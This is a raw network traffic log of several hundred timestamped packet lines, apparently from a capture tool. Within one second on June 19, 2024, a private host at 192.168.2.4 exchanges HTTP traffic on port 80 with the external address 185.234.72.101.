                                                                            Jun 19, 2024 22:40:18.280355930 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.280389071 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.282114983 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.367542028 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.367592096 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.367626905 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.367660046 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.367695093 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.367727995 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.367728949 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.367758989 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.367800951 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.367836952 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.367854118 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.367887020 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.367888927 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.367923021 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.367957115 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.367985964 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.367985964 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.367993116 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368024111 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.368029118 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368047953 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.368065119 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368098021 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368129969 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368160009 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.368164062 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368196964 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.368218899 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368252993 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368256092 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.368283033 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.368288040 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368321896 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368354082 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368386984 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.368387938 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368419886 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.368422031 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368457079 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368503094 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.368531942 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368568897 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368658066 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.368690968 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368724108 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368757010 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368788004 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.368789911 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368827105 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368860960 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368894100 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368894100 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.368928909 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368964911 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.368995905 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.369225025 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.369257927 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.369296074 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.369328022 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.369328976 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.369376898 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.369410038 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.369440079 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.369441986 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.369474888 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.369508028 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.369539976 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.369807959 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.369839907 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.369874954 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.369905949 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.369906902 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.369940996 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.369973898 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.370004892 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.370007038 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.370044947 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.370075941 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.370079041 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.370111942 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.370141983 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.370145082 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.370176077 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.370208025 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.370238066 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.370242119 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.370275974 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.370363951 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.370922089 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.370973110 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371007919 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371043921 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371076107 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.371077061 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371114016 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371148109 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371181965 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371182919 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.371212959 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371247053 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371277094 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.371280909 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371315002 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371347904 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371378899 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.371381998 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371416092 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371499062 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.371612072 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371649027 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371681929 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371716022 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.371735096 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371768951 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371803999 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371835947 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.371835947 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371871948 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371905088 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371934891 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.371937037 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.371973038 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.372008085 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.372040033 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.372045994 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.372081041 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.372112036 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.372140884 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.372744083 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.372771025 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.372786999 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.372803926 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.372818947 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.372834921 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.372838020 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.372838020 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.372850895 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.372859001 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.372868061 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.372891903 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.372900963 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.372900963 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.372910023 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.372925043 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.372937918 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.372939110 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.372941017 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.372957945 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.372970104 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.372970104 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.372975111 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.372992039 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.373007059 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.373007059 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.373030901 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.373030901 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.373439074 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.373456001 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.373471022 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.373498917 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.373500109 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.373548031 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.373564005 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.373574018 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.373578072 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.373594999 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.373610020 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.373610020 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.373610973 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.373629093 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.373639107 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.373639107 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.373645067 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.373661995 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.373673916 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.373673916 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.373677969 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.373694897 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.373708010 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.373708010 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.373743057 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.373743057 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.456330061 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.456381083 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.456384897 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.456418037 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.456423044 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.456454992 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.456464052 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.456504107 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.456521988 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.456557989 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.456568956 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.456598043 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.456621885 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.456669092 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.456680059 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.456721067 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.456756115 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.456764936 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.456790924 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.456792116 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.456825972 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.456851006 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.456860065 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.456861019 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.456895113 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.456902981 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.456932068 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.456934929 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.456967115 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.456975937 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457005024 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457005978 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457046032 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457345009 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457380056 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457390070 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457413912 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457425117 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457448006 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457458019 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457483053 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457489014 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457516909 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457524061 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457551003 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457561970 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457586050 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457596064 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457621098 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457624912 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457654953 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457663059 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457690001 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457694054 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457753897 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457779884 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457822084 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458144903 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458180904 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458190918 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458214998 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458223104 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458250046 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458282948 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458292007 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458317041 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458324909 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458352089 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458362103 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458386898 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458410025 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458422899 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458427906 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458457947 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458467007 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458493948 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458499908 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458527088 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458534956 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458565950 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458610058 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459197044 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459244967 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459248066 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459285021 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459290028 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459321022 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459327936 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459362984 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459378004 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459419012 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459454060 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459460974 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459489107 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459503889 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459523916 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459536076 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459558010 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459592104 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459600925 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459625959 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459630013 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459661007 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459666967 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459697008 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459700108 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459732056 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459764004 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459774971 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459799051 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459799051 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459832907 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459840059 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459867954 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459902048 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459907055 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459944963 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.460171938 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.460206985 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.460216999 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.460242033 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.460275888 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.460275888 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.460283995 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.460310936 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.460344076 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.460349083 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.460378885 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.460393906 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.460413933 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.460443974 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.460447073 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.460455894 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.460510015 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.460546017 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.460556030 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.460582018 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.460587978 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.460617065 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.460633993 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.460652113 CEST8049765185.234.72.101192.168.2.4
